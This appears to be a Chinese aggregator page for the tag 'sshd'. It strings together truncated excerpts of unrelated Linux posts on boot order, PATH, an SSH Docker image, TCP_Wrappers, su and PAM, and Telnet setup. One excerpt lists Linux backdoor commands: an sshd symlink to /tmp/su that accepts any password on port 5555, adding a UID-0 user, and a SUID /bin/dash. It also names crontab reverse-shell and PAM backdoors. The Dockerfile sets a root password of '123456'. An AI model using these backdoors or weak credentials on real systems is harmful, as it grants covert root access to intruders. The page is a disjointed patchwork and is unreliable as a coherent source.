sshd

Linux之命令进阶

穿精又带淫゛_ 提交于 2019-12-31 22:54:04
Linux系统的启动过程 1.开机自检 BIOS 2.MBR引导 3.GRUB菜单 4.加载内核 5.运行init进程 6.从/etc/inittab读取运行级别 7.根据/etc/rc.sysinit 初始化系统(设置主机名 设置ip) 8.根据运行级别启动对应的软件(开机自启动软件) 9.运行mingetty显示登录界面 PATH环境变量 什么是环境变量 1、大写 2、在系统大部分地方都可以使用,含义相同 3、常见的环境变量 LANG PATH PS1 PATH含义 路径-存放的是Linux命令的位置/路径 [root@luffy_boy-001 ~]# echo $PATH /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin # 用冒号分割 [root@luffy_boy-001 ~]# echo $LANG en_US.UTF-8 linux下面运行命令过程 1、输入命令 2、在PATH里面 进行查找 3、找到了就运行,找不到就提示:command not found 查看目录 如何过滤出已知当前目录下oldboy中的所有一级目录(提示:不包含oldboy目录下面目录的子目录及隐藏目录,即只能是第一级目录)? ##创建环境 mkdir /oldboy -p cd /oldboy

构建Ssh镜像与Systemctl镜像

断了今生、忘了曾经 提交于 2019-12-30 22:50:46
操作步骤 ●下载基础镜像 ●建立工作目录. ●创建并编写Dockerfile文件 ●生成镜像 ●启动容器并修改root密码 ●Build镜像命令 具体操作: //创建目录 mkdir sshd cd sshd vim Dockerfile #基于基础的镜像 FROM centos #维护镜像的用户信息 MAINTAINER The CentOS Project <cloud-centos> #安装必要环境包 RUN yum -y update RUN yum -y install openssh* net-tools lsof telnet passwd #给root用户设置密码 RUN echo '123456' | passwd --stdin root #修改配置文件 RUN sed -i 's/UsePAM yes/UsePAM no/g' /etc/ssh/sshd_config #密钥对验证 RUN ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key #开启PAM模块中相应功能 RUN sed -i '/^session\s\+repuired\s\+pam_loginuid.so/s/^/#/' /etc/pam.d/sshd #创建目录并授权赋予权限 RUN mkdir -p /root/.ssh && chown root

Jumper跳板机,远程主机相关配置

孤街醉人 提交于 2019-12-30 05:33:12
1、Jumper-server   登录方式   ssh user@ip登录    【默认22端口,如未添加user,默认使用当前登录账户登录】   ssh -luser ip -pport    【使用指定用户,指定端口登录】   ssh 使用主机名登录   【 需要在跳板机上添加配置hosts文件vim /etc/hosts】    2、app1-server   查看ssh命令所在路径   [root@app1-server ~]# which ssh   /usr/bin/ssh   查询软件包   [root@app1-server ~]# rpm -qf /usr/sbin/sshd   openssh-server-5.3p1-123.el6_9.x86_64   查询软件列表    [root@app1-server ~]# rpm -qf /usr/sbin/sshd   openssh-server-5.3p1-123.el6_9.x86_64   [root@app1-server ~]# rpm -ql openssh-server   /etc/pam.d/ssh-keycat   /etc/pam.d/sshd   /etc/rc.d/init.d/sshd   /etc/ssh/sshd_config   /etc/sysconfig/sshd   

TCP_Wrappers 简介

半城伤御伤魂 提交于 2019-12-27 03:54:37
TCP_Wrappers 简介 TCP_Wrappers是一个工作在第四层(传输层)的的安全工具,对有状态连接的特定服务进行安全检测并实现访问控制,凡是包含有libwrap.so库文件的的程序就可以受 TCP_Wrappers 的安全控制。它的主要功能就是控制谁可以访问,常见的程序有rpcbind、vsftpd、sshd,telnet。 工作原理 TCP_Wrappers有一个TCP的守护进程叫作tcpd。以ssh为例,每当有ssh的连接请求时,tcpd即会截获请求,先读取系统管理员所设置的访问控制文件,符合要求,则会把这次连接原封不动的转给真正的ssh进程,由ssh完成后续工作;如果这次连接发起的ip不符合访问控制文件中的设置,则会中断连接请求,拒绝提供ssh服务。 TCP_Wrappers的使用 TCP_Wrappers的使用主要是依靠两个配置文件 /etc/hosts.allow , /etc/hosts.deny ,用于拒绝和接受具有TCP_Wrappers控制全的程序,详细信息具体可以查看man帮助,这里我们就做简单的演示和使用(man 5 hosts_access, man 5 hosts_options) 要说明的是当我们启动一个受控制的软件的时候,比如ssh, 不过在刚开始的时候, /etc/hosts.allow, /etc/hosts.deny 什么都没有添加

TCP_Wrappers访问控制

安稳与你 提交于 2019-12-27 03:54:14
一、TCP_Wrappers简介 对有状态连接的特定服务进行安全检测并实现访问控制,它以库文件形式实现,某进程是否接受libwrap的控制取决于发起此进程的程序在编译时是否针对libwrap进行编译的,判断服务程序是否能够由tcp_wrapper进行访问控制的方法: ldd /PATH/TO/PROGRAM|grep libwrap.so strings PATH/TO/PROGRAM|grep libwrap.so 例sshd: [ root@newhostname 1372 ] # which sshd /usr/sbin/sshd [ root@newhostname 1372 ] # ldd /usr/sbin/sshd | grep libwrap libwrap.so .0 => /lib64/libwrap.so .0 ( 0x00007f5659d39000 ) [ root@newhostname 1372 ] # strings /usr/sbin/sshd | grep libwrap libwrap.so .0 libwrap refuse returns 它通过/etc/hosts.allow, /etc/hosts.deny这两个配置文件来对来访支持tcp_warppers模块的服务的ip进行访问限制。 这两个配置文件的读取顺序优先allow

su命令详解

廉价感情. 提交于 2019-12-27 03:51:49
----------------------------------------------------------------- su 权限设置 [root@localhost ~]# vim /etc/pam.d/su //pam认证 开启:auth required pam_wheel.so use_uid //去掉# [root@localhost ~]# vim /etc/group wheel:x:10:han //han账户加入wheel,可以使用su [han@localhost ~]$ su - lisi //han可以切换 Password: [lisi@localhost ~]$ su - han //lisi不可以切换 Password: su: incorrect password ----------------------------------------------------------------- Pam模块 Linux系统中的Pam模块为可热插拔的认证模块(*.so) 1、配置文件 # ls /etc/pam.d/ atd other subscription-manager …… newrole su 其中system-auth和password-auth配置文件是RHEL6实现用户名验证机制配置文件,大多数服务的配置将都会调用它们。 2

linux后门

谁说胖子不能爱 提交于 2019-12-25 22:54:54
目录 ssh软连接 添加用户 修改/etc/sudoers文件 suid后门 crontab反弹shell后门 ssh免密登录 ssh wrapper后门 inetd strace后门 协议后门 icmp PAM后门 ssh软连接 #只有root用户才可以这种方法 #拿到root权限后执行 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; #任意密码连接5555端口 ssh root@106.13.124.93:5555 ssh root@106.13.124.93 -p 5555 检测:查看可疑进程 # ps aux 清除后门: 结束进程即可, # kill -s 9 PID 添加用户 root权限 一句话添加用户 useradd guest;echo 'guest:123456'|chpasswd #vi /etc/passwd 最后一行改为(要修改,不要新加一行): guest:x:0:1002:::/bin/bash 这样可以用guest-123456用户来登陆了,而且是root权限 修改/etc/sudoers文件 新建普通用户,修改sudoers文件 解决:手动编辑文件 # visudo suid后门 root权限下: # chmod 4755 /bin/dash 这里注意一下不能是/bin/bash

Jsch sftp channel state impact by previous channel state of the same session?

馋奶兔 提交于 2019-12-25 06:32:43
问题 In my code I am trying to keep the Jsch session active cause I expect many interactions with the server will happen. And the logic is: One thread will open channel on the session to check if a file exists Another thread try to open channel on the same session to send a file to the server However I found if #1 give me a "file not found", #2 will fail with the same exception at here: Header header=new Header(); header=header(buf, header); int length=header.length; int type=header.type; fill(buf

【讲清楚,说明白!】服务管理

拥有回忆 提交于 2019-12-24 18:55:09
目录: (一)了解服务的概念 (二)服务器状态查看、启动、关闭、重启 (三)设置服务开机自动启动 (四)服务是如何定义的 (五)运行级别:了解后缀为target的服务 (一)了解服务的概念 (1.1)首先我们看一下Windows系统中的服务,例如系统中的DHCP Client服务,其中“状态”指的是当前的状态,而当前状态我们可以选择“启动、停止、暂停、恢复、重新启动”;即使我们设置当前的状态为“停止”,但是在系统重新启动后仍然是会成为“已开启”的状态,这是由于在“启动类型”处,我们设置的是“自动”启动类型,因此启动类型不会影响当前系统的状态,只会影响系统下次重启系统时的状态。 (二)服务器状态查看、启动、关闭、重启 (2.1)而在Linux系统中,我们可以使用systemctl命令查询系统中所有的服务信息(图1-2),在Linux系统中类似于Windows系统中的服务都是以后缀为service的服务(图1-3)。 # systemctl list-unit-files---查询系统中所有的服务 # systemctl list-unit-files --type service---查询所有类型为service的服务 (2.2)我们首先查询系统中是否有ftp、sshd服务,可以使用list-unit-files参数确定服务的具体名称。然后可以查询sshd服务是否是正常运行的状态

linux远程登录(使用Telnet、SSH)

◇◆丶佛笑我妖孽 提交于 2019-12-24 15:33:31
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 系统:RHEL 5.5 64位,使用CentOS的yum源并作更新处理 一、Telnet(远程登录推荐SSH) 1、安装、启动Telnet 1.1、安装和启动一般需要两个包: telnet-client提供客户端程序 telnet-server提供服务器端程序 1.2、安装之前,确定是否已经安装Telnet [root @localhost Server]# rpm -qa|grep telnet telnet-server-0.17-39.el5 telnet-0.17-39.el5 说明已经安装,若未安装,可挂载RHEL5.5的DVD光盘镜像,在Server文件夹下找到并安装下面三个包: [root @localhost Server]# rpm -ivh xinetd-2.3.14-10.el5.x86_64.rpm #先安装这个包 [root @localhost Server]# rpm -ivh telnet- telnet-0.17-39.el5.x86_64.rpm telnet-server-0.17-39.el5.x86_64.rpm #这两个包的安装顺序是从左到右依次安装 1.3、启动: 方法一: 用# setup命令,选择系统服务,在里面找到Telnet,用空格键选中(前面加*)